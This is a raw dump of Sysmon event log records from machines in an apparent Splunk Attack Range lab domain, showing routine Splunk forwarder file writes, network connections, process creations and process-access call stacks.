Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08A697747F3784E7C64EE5AAAEDD88E2,SHA256=8AEFB76BA91E05EDA3B4481CA75DA517C07E7CB47D50CD8CD80FBFCE748280BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807116Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:45.021{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=693BA822C4831C715BF0074051D467DA,SHA256=1843373B80EF99083185999744C1FF846003D9F6920AE61DB4E09673EE6E8416,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:46.481{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B737D6DDBD21A221DEF79C263282F73E,SHA256=B649580956ADC54802CED8A5A9ED2FE5DBA40D174151FEB2A4BEC5BB7B900D69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807117Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:46.053{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=461A784AB19E1A9648525AEE5613691E,SHA256=954CD0C702C8F84AECAE2C8C31A7FE3300B541394838C608F6FDB3FC0038616B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:47.517{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBAC2529290AB332C6033EA50D93D8B9,SHA256=E0BAD4433ECDB8D6DD97177756E4397EA91C578A26AB900810057B801AD1A18E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807118Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:47.069{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEB7671F656C96BF408F1946A1B5772C,SHA256=C656DFFED828B6E080DDD7E3DA03BE1444BC110C98C676C2A7E3712407486C87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:48.532{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05864C2906FAA51FAD4AC1EB0AC6F394,SHA256=55D24A7D16A353A3C128E137AF926D192505E03DEDC472ADE9AD2C8B6B720998,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807119Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:48.147{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88CFE70B7B7F0FDF10C22BB80940E926,SHA256=7C3C615FE5639D82FD6E9E001A9871D817F01556AC951B82CEFC9F30F64B7373,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:49.546{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=230443D21F200450502FC164E7A547A3,SHA256=620D06F209A37D08F854EA1B092062C8ECCB5B360663136EEF04CF3C210FFFF2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807121Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:48.342{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57232-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807120Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:49.163{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC957B3354F9E0F8839DD99AB924C9A3,SHA256=B58C7F4C70F67889A8945EB74127836E8DD262052A3B37262141B335AE2AC024,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:42.664{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50991-false10.0.1.12-8000- 10341000x80000000000000001047877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.947{466BC892-F41E-60EB-167D-00000000CF01}98888812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.747{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F41E-60EB-167D-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.747{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F41E-60EB-167D-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.747{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.747{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.747{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F41E-60EB-167D-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.747{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.747{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.733{466BC892-F41E-60EB-167D-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.547{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1831B9345B25425AFB76263131E3D86,SHA256=4B99962F98D2D7872C335A8B4A4CBD3E72033B19E2E53DC806A973AF8B50426C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807122Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:50.178{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1243147C97AC146EC54C3D7A538E3CFF,SHA256=8DF424A374447BAAE5526ED2F878769D0BAC95E8205904D1ECCA88DF26D9B67C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.216{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F41E-60EB-157D-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.216{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.216{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.216{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.216{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.216{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F41E-60EB-157D-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.216{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F41E-60EB-157D-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.195{466BC892-F41E-60EB-157D-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.196{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=AA1F8526B0AFFC4E3840B3165664785F,SHA256=443B85D8E0606F587CA63BD7A37FFF32C28A0B30A460BB7FA5F784E63FC29AA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.563{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF22973B2D078B3BF21CCCFC18C8D948,SHA256=CCFB329B5D081A196E7D0909DFA559A824061A7684FB9F8F4B79463104A7262B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807123Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:51.178{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B09C7A523447DD0C58A31262855B621,SHA256=2B80CEF08A71E4FF799D931F6873535FB01D9C0ED82B1B662CCC1829C6F6B7D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.517{466BC892-F41F-60EB-177D-00000000CF01}40728676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.348{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F41F-60EB-177D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 